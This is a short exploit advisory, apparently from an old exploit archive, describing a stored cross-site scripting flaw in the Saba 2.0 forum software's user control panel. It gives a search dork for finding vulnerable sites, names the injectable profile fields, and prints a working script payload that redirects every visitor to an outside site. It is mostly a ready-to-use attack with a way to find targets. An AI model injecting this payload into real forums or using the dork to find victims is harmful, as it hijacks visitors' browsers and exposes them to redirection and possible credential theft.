saba-xss.txt

`Saba 2.0 Cross Site Scripting (JS Injection)  
http://Aria-Security.com  
---------------------------------------------------------------  
Saba 2.0 is a Persian Forum Script   
Dork: Powered by Saba 2.0  
Vulnerable file: usercp.php  
  
usercp.php?username=YourUserName  
  
The above script can be inserted as Location, Yahoo ID and other fields in the usercp page..   
  
<script> document.write('<meta http-equiv="refresh" content="0; url=http://Aria-Security.com/index.html">'); </script>  
  
  
The-0utl4w  
Aria-Security Team  
`